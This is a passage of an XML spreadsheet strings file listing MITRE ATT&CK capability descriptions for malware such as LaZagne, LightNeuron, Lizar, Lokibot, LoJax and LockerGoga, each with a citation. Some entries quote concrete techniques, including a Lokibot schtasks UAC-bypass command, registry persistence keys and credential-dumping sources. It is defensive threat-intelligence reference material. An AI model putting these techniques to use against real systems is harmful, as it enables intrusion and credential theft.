    <t>[LOWBALL](https://attack.mitre.org/software/S0042) uses the Dropbox API to request two files, one of which is the same file as the one dropped by the malicious email attachment. This is most likely meant to be a mechanism to update the compromised host with a new version of the [LOWBALL](https://attack.mitre.org/software/S0042) malware.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LOWBALL](https://attack.mitre.org/software/S0042) command and control occurs via HTTPS over port 443.(Citation: FireEye admin@338)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information from /etc/shadow using the shadow.py module.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from MSCache to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from chats, databases, mail, and WiFi.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from databases, mail, and WiFi across multiple platforms.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from web browsers such as Google Chrome, Internet Explorer, and Firefox.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from macOS Keychains.(Citation: GitHub LaZagne Dec 2018)	</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from LSA secrets to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can perform credential dumping from memory to obtain account and password information.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t>[LaZagne](https://attack.mitre.org/software/S0349) can obtain credential information running Linux processes.(Citation: GitHub LaZagne Dec 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[LaZagne](https://attack.mitre.org/software/S0349) can obtain credentials from Vault files.(Citation: GitHub LaZagne Dec 2018)	</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) contains a function to encrypt and store emails that it collects.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically collect files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to automatically exfiltrate files under a specified directory.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can collect files from a local system.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used AES and XOR to decrypt configuration files and commands.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) exfiltrates data over its email C2 channel.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has a function to delete files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has the ability to download and execute additional files.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can store email data in files and directories specified in its configuration, such as &lt;code&gt;C:\Windows\ServiceProfiles\NetworkService\appdata\Local\Temp\&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses SMTP for C2.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used filenames associated with Exchange and Outlook for binary and configuration files, such as &lt;code&gt;winmail.dat&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of starting a process using CreateProcess.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) encrypts its configuration files with AES-256.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) collects Exchange emails matching rules specified in its configuration.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) can be configured to exfiltrate data during nighttime or working hours.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is controlled via commands that are embedded into PDFs and JPGs using steganographic methods.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) uses AES to encrypt C2 traffic.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers the victim computer name using the Win32 API call &lt;code&gt;GetComputerName&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) gathers information about network adapters using the Win32 API call &lt;code&gt;GetAdaptersInfo&lt;/code&gt;.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of modifying email content, headers, and attachments during transit.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) has used a malicious Microsoft Exchange transport agent for persistence.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is capable of executing commands via cmd.exe.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can obtain data from local systems.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change C2 servers.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can delete files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can list contents of drives and search for files.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can download files onto compromised hosts.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve a list of running processes.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can change the frequency at which compromised hosts contact remote C2 infrastructure.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can retrieve system information.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) creates a backdoor through which remote attackers can start a remote shell.(Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) sends the payload from the C2 server as an encoded URL parameter. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) attempts to gain access to the server via SSH.(Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) brute forces SSH passwords in order to attempt to gain access and install its malware onto the server. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) opens a socket on port 22 and if it receives a response it attempts to obtain the machine's hostname and Top-Level Domain. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) maintains persistence on an infected machine through rc.local and .bashrc files. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[Linux Rabbit](https://attack.mitre.org/software/S0362) acquires valid SSH accounts through brute force. (Citation: Anomali Linux Rabbit 2018)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to decrypt and decode multiple layers of obfuscation.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can securely delete files by first writing random data to the file.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to download files.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can query the Registry to check for the presence of &lt;code&gt;HKCU\Software\KasperskyLab&lt;/code&gt;.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can create persistence by adding a shortcut in the &lt;code&gt;CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to check for the presence of Kaspersky security software.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has been packed with multiple layers of encryption.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has used image files to hide its loader component.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can enumerate the CPUID and BIOS version on a compromised system.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) has the ability to discover the proxy configuration of Firefox and/or Opera.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can enumerate the account name on a targeted system.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can wait 30 seconds before executing additional code if security software is detected.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LiteDuke](https://attack.mitre.org/software/S0513) can use HTTP GET requests in C2 communications.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can send collected data, including screenshots, over its C2 channel.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) has the ability to download payloads containing system commands to a compromised host.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use various API calls.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use a PowerShell script to execute commands.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can query the Registry for keys added to execute COM hijacking.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can create a scheduled task to enable persistence mechanisms.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can take system screenshots and save them to `%AppData%`.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can identify installed AV software.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) has the ability to list local drives and enumerate the OS architecture.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can determine if the current user has admin privileges.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[LitePower](https://attack.mitre.org/software/S0680) can use HTTP and HTTPS for C2 communications.(Citation: Kaspersky WIRTE November 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has encrypted data before sending it to the server.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can retrieve browser history and database files.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a module to collect usernames and passwords stored in browsers.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can decrypt its configuration data.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has used the PowerKatz plugin that can be loaded into the address space of a PowerShell process through reflective DLL loading.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect email accounts from Microsoft Outlook and Mozilla Thunderbird.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can support encrypted communications between the client and server.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can download additional plugins, files, and tools.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can run [Mimikatz](https://attack.mitre.org/software/S0002) to harvest credentials.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has used various Windows API functions on a victim's machine.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can execute PE files in the address space of the specified process.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has used PowerShell scripts.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin designed to obtain a list of processes.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can migrate the loader into another process.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can take JPEG screenshots of an infected system.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can search for processes associated with an anti-virus product from list.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect the computer name from the machine,.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) can retrieve network information from a compromised host.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin to retrieve information about all active network sessions on the infected server.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) can collect the username from the system.(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lizar](https://attack.mitre.org/software/S0681) has a command to open the command-line on the infected system.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) </t>
  </si>
  <si>
    <t>[Lizar](https://attack.mitre.org/software/S0681) has a plugin that can retrieve credentials from Internet Explorer and Microsoft Edge using `vaultcmd.exe` and another that can collect RDP access credentials using the `CredEnumerateW` function.(Citation: BiZone Lizar May 2021)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt;.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has loaded an embedded NTFS DXE driver to be able to access and write to NTFS partitions.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) has modified the Registry key &lt;code&gt;‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’&lt;/code&gt; from &lt;code&gt;‘autocheck autochk *’&lt;/code&gt; to &lt;code&gt;‘autocheck autoche *’&lt;/code&gt; in order to execute its payload during Windows startup.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoJax](https://attack.mitre.org/software/S0397) is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.(Citation: ESET LoJax Sept 2018) </t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed changing account passwords and logging off current users.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been signed with stolen certificates in order to make it look more legitimate.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has encrypted files, including core Windows OS files, using RSA-OAEP MGF1 and then demanded Bitcoin be paid for the decryption key.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) installation has been immediately preceded by a "task kill" command in order to disable anti-virus.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed deleting its original launcher after execution.(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed moving around the victim network via SMB, indicating the actors behind this ransomware are manually copying files form computer to computer instead of self-propagating.(Citation: Unit42 LockerGoga 2019)</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) has been observed shutting down infected systems.(Citation: Wired Lockergoga 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">
[Lokibot](https://attack.mitre.org/software/S0447) has utilized multiple techniques to bypass UAC.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has stolen credentials from multiple applications and data sources including Windows OS credentials, email clients, FTP, and SFTP clients.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has demonstrated the ability to steal credentials from multiple applications and data sources including Safari and the Chromium and Mozilla Firefox-based web browsers.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to initiate contact with command and control (C2) to exfiltrate stolen data.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) will delete its dropped files after bypassing UAC.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) can search for specific files on an infected host.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to copy itself to a hidden file and directory.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) downloaded several staged items onto the victim's machine.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to capture input on the compromised host via keylogging.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has tricked recipients into enabling malicious macros by getting victims to click "enable content" in email attachments.(Citation: TrendMicro Msiexec Feb 2018)(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has modified the Registry as part of its UAC bypass process.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used PowerShell commands embedded inside batch scripts.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject itself into legitimate Windows process.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has reflectively loaded the decoded DLL into memory.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) embedded the commands &lt;code&gt;schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I&lt;/code&gt; inside a batch script.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447)'s second stage DLL has set a timer using “timeSetEvent” to schedule its next execution.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has used several packing methods for obfuscation.(Citation: Infoblox Lokibot January 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) is delivered via a malicious XLS attachment contained within a spearhpishing email.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the computer name and Windows product name/version.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the domain name of the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has the ability to discover the username on the infected host.(Citation: FSecure Lokibot November 2019)</t>
  </si>
  <si>
    <t>[Lokibot](https://attack.mitre.org/software/S0447) has performed a time-based anti-debug check before downloading its third stage.(Citation: Talos Lokibot Jan 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used VBS scripts and XLS macros for execution.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used HTTP for C2 communications.(Citation: Infoblox Lokibot January 2019)(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Lokibot](https://attack.mitre.org/software/S0447) has used &lt;code&gt;cmd /c&lt;/code&gt; commands embedded within batch scripts.(Citation: Talos Lokibot Jan 2021) </t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) side loads its communications module as a DLL into the &lt;code&gt;libcurl.dll&lt;/code&gt; loader.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a function that decrypts malicious data.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) removes itself after execution and can delete files on the system.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can retrieve file listings from the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has a C2 proxy tool that masquerades as &lt;code&gt;GUP.exe&lt;/code&gt;, which is software used by Notepad++.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a custom binary protocol over sockets for C2 communications.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can list running processes.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) sets up a Registry Run key to establish a persistence mechanism.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can take desktop screenshots.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can kill processes and delete services.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) uses a modified version of RC4 for data transfer.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can enumerate services on the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) can shutdown and reboot the victim machine.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) has used VBA macros in Microsoft Word attachments to drop additional files to the host.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582)’s C2 proxy tool sends data to a C2 server over HTTP.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LookBack](https://attack.mitre.org/software/S0582) executes the &lt;code&gt;cmd.exe&lt;/code&gt; command.(Citation: Proofpoint LookBack Malware Aug 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) is typically bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) deleted installation files after completion.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has set the attributes of the VirtualBox directory and VBoxVmService parent directory to "hidden".(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) used SCP to update the miner from the C2.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) adds plist files with the naming format &lt;code&gt;com.[random_name].plist&lt;/code&gt; in the &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folder with the RunAtLoad and KeepAlive keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) launched the QEMU services in the &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt; folder using &lt;code&gt;launchctl&lt;/code&gt;. It also uses &lt;code&gt;launchctl&lt;/code&gt; to unload all [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s when updating to a newer version of [LoudMiner](https://attack.mitre.org/software/S0451).(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used an MSI installer to install the virtualization software.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) has obfuscated various scripts and encrypted DMG files.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) used the &lt;code&gt;ps&lt;/code&gt; command to monitor the running processes on the system.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) harvested system resources to mine cryptocurrency, using XMRig to mine Monero.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) has used QEMU and VirtualBox to run a Tiny Core Linux virtual machine, which runs XMRig and makes connections to the C2 server for updates.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t>[LoudMiner](https://attack.mitre.org/software/S0451) started the cryptomining virtual machine as a service on the infected machine.(Citation: ESET LoudMiner June 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[LoudMiner](https://attack.mitre.org/software/S0451) has monitored CPU usage.(Citation: ESET LoudMiner June 2019)	</t>
  </si>
  <si>
